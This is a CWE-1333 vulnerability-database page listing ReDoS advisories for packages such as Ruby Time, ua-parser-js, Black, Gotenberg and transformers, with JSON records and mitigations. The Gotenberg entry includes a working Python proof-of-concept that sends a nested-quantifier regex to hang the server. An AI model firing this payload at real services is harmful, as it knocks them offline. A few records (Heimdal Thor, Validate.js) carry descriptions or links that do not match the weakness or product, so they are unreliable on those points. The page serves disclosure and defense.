Common Weakness Enumeration

CWE-1333

Allowed

Inefficient Regular Expression Complexity

Abstraction: Base · Status: Draft

The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.

724 vulnerabilities reference this CWE, most recent first.

GHSA-FG7X-G82R-94QC

Vulnerability from github – Published: 2023-03-31 06:30 – Updated: 2025-11-04 19:37
VLAI
Summary
Ruby Time component ReDoS issue
Details

A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "time"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.0"
            },
            {
              "fixed": "0.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "time"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-28756"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-31T22:43:54Z",
    "nvd_published_at": "2023-03-31T04:15:00Z",
    "severity": "HIGH"
  },
  "details": "A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.",
  "id": "GHSA-fg7x-g82r-94qc",
  "modified": "2025-11-04T19:37:42Z",
  "published": "2023-03-31T06:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28756"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released"
    },
    {
      "type": "WEB",
      "url": "https://www.ruby-lang.org/en/downloads/releases"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20230526-0004"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202401-27"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00033.html"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/time/CVE-2023-28756.yml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ruby/time/releases"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ruby/time"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ruby Time component ReDoS issue"
}

GHSA-FHG7-M89Q-25R3

Vulnerability from github – Published: 2023-01-24 15:36 – Updated: 2025-10-17 16:52
VLAI
Summary
ReDoS Vulnerability in ua-parser-js version
Details

Description:

A regular expression denial of service (ReDoS) vulnerability has been discovered in ua-parser-js.

Impact:

This vulnerability bypass the library's MAX_LENGTH input limit prevention. By crafting a very-very-long user-agent string with specific pattern, an attacker can turn the script to get stuck processing for a very long time which results in a denial of service (DoS) condition.

Affected Versions:

From version 0.7.30 to before versions 0.7.33 / 1.0.33.

Patches:

A patch has been released to remove the vulnerable regular expression, update to version 0.7.33 / 1.0.33 or later.

References:

Regular expression Denial of Service - ReDoS

Credits:

Thanks to @Snyk who first reported the issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "ua-parser-js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.7.30"
            },
            {
              "fixed": "0.7.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "ua-parser-js"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.8.0"
            },
            {
              "fixed": "1.0.33"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-25927"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-24T15:36:32Z",
    "nvd_published_at": "2023-01-26T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Description:\nA regular expression denial of service (ReDoS) vulnerability has been discovered in `ua-parser-js`.\n\n### Impact:\nThis vulnerability bypass the library\u0027s `MAX_LENGTH` input limit prevention. By crafting a very-very-long user-agent string with specific pattern, an attacker can turn the script to get stuck processing for a very long time which results in a denial of service (DoS) condition.\n\n### Affected Versions:\nFrom version `0.7.30` to before versions `0.7.33` / `1.0.33`.\n\n### Patches:\nA patch has been released to remove the vulnerable regular expression, update to version `0.7.33` / `1.0.33` or later.\n\n### References:\n[Regular expression Denial of Service - ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n\n### Credits:\nThanks to @Snyk who first reported the issue.",
  "id": "GHSA-fhg7-m89q-25r3",
  "modified": "2025-10-17T16:52:22Z",
  "published": "2023-01-24T15:36:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/faisalman/ua-parser-js/security/advisories/GHSA-fhg7-m89q-25r3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25927"
    },
    {
      "type": "WEB",
      "url": "https://github.com/faisalman/ua-parser-js/commit/a6140a17dd0300a35cfc9cff999545f267889411"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/faisalman/ua-parser-js"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-UAPARSERJS-3244450"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ReDoS Vulnerability in ua-parser-js version"
}

GHSA-FJ7X-Q9J7-G6Q6

Vulnerability from github – Published: 2024-03-19 06:30 – Updated: 2024-03-20 15:24
VLAI
Summary
Black vulnerable to Regular Expression Denial of Service (ReDoS)
Details

Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service.

Exploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "black"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21503"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-75"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-20T15:24:01Z",
    "nvd_published_at": "2024-03-19T05:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service.\n\nExploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings.",
  "id": "GHSA-fj7x-q9j7-g6q6",
  "modified": "2024-03-20T15:24:01Z",
  "published": "2024-03-19T06:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21503"
    },
    {
      "type": "WEB",
      "url": "https://github.com/psf/black/commit/f00093672628d212b8965a8993cee8bedf5fe9b8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/psf/black"
    },
    {
      "type": "WEB",
      "url": "https://github.com/psf/black/releases/tag/24.3.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/black/PYSEC-2024-48.yaml"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-PYTHON-BLACK-6256273"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Black vulnerable to Regular Expression Denial of Service (ReDoS)"
}

GHSA-FMWG-QCQH-M992

Vulnerability from github – Published: 2026-04-07 18:16 – Updated: 2026-04-07 18:16
VLAI
Summary
Gotenberg Vulnerable to ReDoS via extraHttpHeaders scope feature
Details

Summary

Gotenberg uses dlclark/regexp2 to compile user-supplied scope patterns without setting a proper timeout. Users with access to features using this logic can hang workers indefinitely.

Details

Gotenberg uses dlclark/regexp2 to compile user-supplied scope patterns (gotenberg/pkg/modules/chromium/routes.go:200) with no MatchTimeout set, therefore using the default of math.MaxInt64 = "forever".

For example, any user with access to the endpoint /forms/chromium/screenshot/url can add a crafted scope pattern to the extraHttpHeaders form field using a nested quantifiers that causes infinite backtracking, hanging the Gotenberg worker indefinitely.

See the dlclark/regexp2 README.md for further considerations.

Tested on the latest container version gotenberg/gotenberg:8.29.1

PoC

The following Python script uses the /forms/chromium/screenshot/url endpoint, testing for differences in responses times between simple and malicious regexes.

#!/usr/bin/env -S uv run --script
# /// script
# requires-python = ">=3.12"
# dependencies = [
#    "requests",
# ]
# ///
import json
import time
import requests

HOST = "localhost:3000"
# HOST = "gotenberg.local:3000"

def send_request(host: str, headers_dict: dict, label: str, timeout: int = 30):
    """Send a screenshot request to Gotenberg and measure response time."""
    url = f"http://{host}/forms/chromium/screenshot/url"
    print(f"\n[*] {label}")
    print(f"    extraHttpHeaders: {json.dumps(headers_dict)}")

    start = time.time()
    try:
        r = requests.post(
            url,
            data={
                "url": "http://api.service:3000/snapshot/",
                "extraHttpHeaders": json.dumps(headers_dict),
            },
            files={"a": "b"},
            timeout=timeout,
        )
        elapsed = time.time() - start
        print(f"    Status: {r.status_code}, Size: {len(r.content)}, Time: {elapsed:.2f}s")
    except requests.exceptions.Timeout:
        elapsed = time.time() - start
        print(f"    TIMEOUT after {elapsed:.2f}s — Gotenberg worker is hung (ReDoS confirmed)")
    except requests.exceptions.ConnectionError as e:
        elapsed = time.time() - start
        print(f"    CONNECTION ERROR after {elapsed:.2f}s: {e}")


def main():
    # --- Test 1: Baseline ---
    send_request(HOST, {"X-Test": "baseline"}, "Baseline: no scope")

    # --- Test 2: Simple scope ---
    send_request(HOST, {"X-Test": "value; scope=.*"}, "Simple scope: '.*'")

    # --- Test 3: ReDoS scope ---
    # Classic evil pattern: nested quantifiers on overlapping character class.
    evil_pattern = r"([a-zA-Z0-9.:/_]+)+\!"
    send_request(
        HOST,
        {"X-Test": f"value; scope={evil_pattern}"},
        f"ReDoS scope: '{evil_pattern}'",
        timeout=15,
    )


if __name__ == "__main__":
    main()

Impact

This is a ReDoS vulnerability which only impacts the availability of the service and/or server on which gotenberg is running. All instances where attackers can reach the /forms/chromium/screenshot/url endpoint specifing the extraHttpHeaders field are affected.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 8.29.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.30.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35458"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-07T18:16:19Z",
    "nvd_published_at": "2026-04-07T15:17:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nGotenberg uses `dlclark/regexp2` to compile user-supplied scope patterns without setting a proper timeout. Users with access to features using this logic can hang workers indefinitely. \n\n### Details\nGotenberg uses `dlclark/regexp2` to compile user-supplied scope patterns (gotenberg/pkg/modules/chromium/routes.go:200) with no MatchTimeout set, therefore using the default of math.MaxInt64 = \"forever\".\n\nFor example, any user with access to the endpoint `/forms/chromium/screenshot/url` can add a crafted scope pattern to the `extraHttpHeaders` form field using a nested quantifiers that causes infinite backtracking, hanging the Gotenberg worker indefinitely.\n\nSee the [dlclark/regexp2 README.md](https://github.com/dlclark/regexp2?tab=readme-ov-file#catastrophic-backtracking-and-timeouts) for further considerations.\n\nTested on the latest container version gotenberg/gotenberg:8.29.1\n\n### PoC\n\nThe following Python script uses the `/forms/chromium/screenshot/url` endpoint, testing for differences in responses times between simple and malicious regexes.\n\n```python\n#!/usr/bin/env -S uv run --script\n# /// script\n# requires-python = \"\u003e=3.12\"\n# dependencies = [\n#    \"requests\",\n# ]\n# ///\nimport json\nimport time\nimport requests\n\nHOST = \"localhost:3000\"\n# HOST = \"gotenberg.local:3000\"\n\ndef send_request(host: str, headers_dict: dict, label: str, timeout: int = 30):\n    \"\"\"Send a screenshot request to Gotenberg and measure response time.\"\"\"\n    url = f\"http://{host}/forms/chromium/screenshot/url\"\n    print(f\"\\n[*] {label}\")\n    print(f\"    extraHttpHeaders: {json.dumps(headers_dict)}\")\n\n    start = time.time()\n    try:\n        r = requests.post(\n            url,\n            data={\n                \"url\": \"http://api.service:3000/snapshot/\",\n                \"extraHttpHeaders\": json.dumps(headers_dict),\n            },\n            files={\"a\": \"b\"},\n            timeout=timeout,\n        )\n        elapsed = time.time() - start\n        print(f\"    Status: {r.status_code}, Size: {len(r.content)}, Time: {elapsed:.2f}s\")\n    except requests.exceptions.Timeout:\n        elapsed = time.time() - start\n        print(f\"    TIMEOUT after {elapsed:.2f}s \u2014 Gotenberg worker is hung (ReDoS confirmed)\")\n    except requests.exceptions.ConnectionError as e:\n        elapsed = time.time() - start\n        print(f\"    CONNECTION ERROR after {elapsed:.2f}s: {e}\")\n\n\ndef main():\n    # --- Test 1: Baseline ---\n    send_request(HOST, {\"X-Test\": \"baseline\"}, \"Baseline: no scope\")\n\n    # --- Test 2: Simple scope ---\n    send_request(HOST, {\"X-Test\": \"value; scope=.*\"}, \"Simple scope: \u0027.*\u0027\")\n\n    # --- Test 3: ReDoS scope ---\n    # Classic evil pattern: nested quantifiers on overlapping character class.\n    evil_pattern = r\"([a-zA-Z0-9.:/_]+)+\\!\"\n    send_request(\n        HOST,\n        {\"X-Test\": f\"value; scope={evil_pattern}\"},\n        f\"ReDoS scope: \u0027{evil_pattern}\u0027\",\n        timeout=15,\n    )\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\n\nThis is a ReDoS vulnerability which only impacts the availability of the service and/or server on which gotenberg is running. All instances where attackers can reach the `/forms/chromium/screenshot/url` endpoint specifing the `extraHttpHeaders` field are affected.",
  "id": "GHSA-fmwg-qcqh-m992",
  "modified": "2026-04-07T18:16:19Z",
  "published": "2026-04-07T18:16:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-fmwg-qcqh-m992"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35458"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/commit/cfb48d9af48cb236244eabe5c67fe1d30fb3fe25"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gotenberg Vulnerable to ReDoS via extraHttpHeaders scope feature"
}

GHSA-FP36-299X-PWMW

Vulnerability from github – Published: 2022-06-03 00:01 – Updated: 2022-06-14 20:02
VLAI
Summary
Regular expression denial of service in devcert
Details

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the devcert npm package, when an attacker is able to supply arbitrary input to the certificateFor method

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "devcert"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-1929"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-03T22:27:34Z",
    "nvd_published_at": "2022-06-02T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the devcert npm package, when an attacker is able to supply arbitrary input to the certificateFor method",
  "id": "GHSA-fp36-299x-pwmw",
  "modified": "2022-06-14T20:02:53Z",
  "published": "2022-06-03T00:01:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1929"
    },
    {
      "type": "WEB",
      "url": "https://github.com/davewasmer/devcert/commit/b0763215f6683271d296fda98f7ef7bcd4a55977"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/davewasmer/devcert"
    },
    {
      "type": "WEB",
      "url": "https://research.jfrog.com/vulnerabilities/devcert-redos-xray-211352"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular expression denial of service in devcert"
}

GHSA-FPWR-67PX-3QHX

Vulnerability from github – Published: 2025-04-29 12:30 – Updated: 2025-08-04 15:27
VLAI
Summary
Transformers Regular Expression Denial of Service (ReDoS) vulnerability
Details

A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the huggingface/transformers library, specifically in the file tokenization_gpt_neox_japanese.py of the GPT-NeoX-Japanese model. The vulnerability occurs in the SubWordJapaneseTokenizer class, where regular expressions process specially crafted inputs. The issue stems from a regex exhibiting exponential complexity under certain conditions, leading to excessive backtracking. This can result in high CPU usage and potential application downtime, effectively creating a Denial of Service (DoS) scenario. The affected version is v4.48.1 (latest).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "transformers"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.50.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1194"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-29T15:17:03Z",
    "nvd_published_at": "2025-04-29T12:15:31Z",
    "severity": "MODERATE"
  },
  "details": "A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the huggingface/transformers library, specifically in the file `tokenization_gpt_neox_japanese.py` of the GPT-NeoX-Japanese model. The vulnerability occurs in the SubWordJapaneseTokenizer class, where regular expressions process specially crafted inputs. The issue stems from a regex exhibiting exponential complexity under certain conditions, leading to excessive backtracking. This can result in high CPU usage and potential application downtime, effectively creating a Denial of Service (DoS) scenario. The affected version is v4.48.1 (latest).",
  "id": "GHSA-fpwr-67px-3qhx",
  "modified": "2025-08-04T15:27:20Z",
  "published": "2025-04-29T12:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1194"
    },
    {
      "type": "WEB",
      "url": "https://github.com/huggingface/transformers/commit/92c5ca9dd70de3ade2af2eb835c96215cc50e815"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/huggingface/transformers"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/86f58dcd-683f-4adc-a735-849f51e9abb2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Transformers Regular Expression Denial of Service (ReDoS) vulnerability"
}

GHSA-FQHP-RHM6-8RRJ

Vulnerability from github – Published: 2023-06-21 21:30 – Updated: 2025-03-11 21:55
VLAI
Summary
Withdrawn Advisory: urlnorm vulnerable to Regular Expression Denial of Service
Details

Withdrawn Advisory

This advisory has been withdrawn because the security impact of the slow printing of URLs has been disputed. This link is maintained to preserve external references.

Original Description

The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "urlnorm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-33289"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-21T21:58:09Z",
    "nvd_published_at": "2023-06-21T20:15:10Z",
    "severity": "HIGH"
  },
  "details": "## Withdrawn Advisory\nThis advisory has been withdrawn because the security impact of the slow printing of URLs has been disputed. This link is maintained to preserve external references.\n\n## Original Description\nThe urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.",
  "id": "GHSA-fqhp-rhm6-8rrj",
  "modified": "2025-03-11T21:55:14Z",
  "published": "2023-06-21T21:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33289"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/6en6ar/b118888dc739e8979038f24c8ac33611"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/progscrape/urlnorm"
    },
    {
      "type": "WEB",
      "url": "https://lib.rs/crates/urlnorm"
    },
    {
      "type": "WEB",
      "url": "https://news.ycombinator.com/item?id=40435263"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Withdrawn Advisory: urlnorm vulnerable to Regular Expression Denial of Service",
  "withdrawn": "2025-03-11T21:55:14Z"
}

GHSA-FRJF-28G7-3864

Vulnerability from github – Published: 2023-12-21 03:30 – Updated: 2023-12-29 03:30
VLAI
Details

An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-29486"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-12-21T01:15:32Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.",
  "id": "GHSA-frjf-28g7-3864",
  "modified": "2023-12-29T03:30:28Z",
  "published": "2023-12-21T03:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29486"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/%40drabek.a/weaknesses-in-heimdal-thors-line-of-products-9d0e5095fb93"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FVFC-VFG9-G345

Vulnerability from github – Published: 2024-09-02 18:31 – Updated: 2024-09-02 18:31
VLAI
Details

A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-7279"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-02T18:15:21Z",
    "severity": "LOW"
  },
  "details": "A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.",
  "id": "GHSA-fvfc-vfg9-g345",
  "modified": "2024-09-02T18:31:24Z",
  "published": "2024-09-02T18:31:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7279"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sse-secure-systems/connaisseur/pull/1407"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sse-secure-systems/connaisseur/commit/524b73ff7306707f6d3a4d1e86401479bca91b02"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sse-secure-systems/connaisseur/releases/tag/v3.3.1"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.276268"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.276268"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FW2V-V7VP-PCCQ

Vulnerability from github – Published: 2024-10-26 21:30 – Updated: 2024-10-26 21:30
VLAI
Details

Validate.js provides a declarative way of validating javascript objects. All versions as of 30 November 2020 contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any patches are available.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-26310"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-26T21:15:14Z",
    "severity": "HIGH"
  },
  "details": "Validate.js provides a declarative way of validating javascript objects. All versions as of 30 November 2020 contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any patches are available.",
  "id": "GHSA-fw2v-v7vp-pccq",
  "modified": "2024-10-26T21:30:46Z",
  "published": "2024-10-26T21:30:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26310"
    },
    {
      "type": "WEB",
      "url": "https://github.com/blowsie/Pure-JavaScript-HTML5-Parser/issues/14"
    },
    {
      "type": "ADVISORY",
      "url": "https://securitylab.github.com/advisories/GHSL-2020-305-redos-Pure-JavaScript-HTML5-Parser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Green",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation
Architecture and Design

Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.

Mitigation
System Configuration

Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.

Mitigation
Implementation

Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.

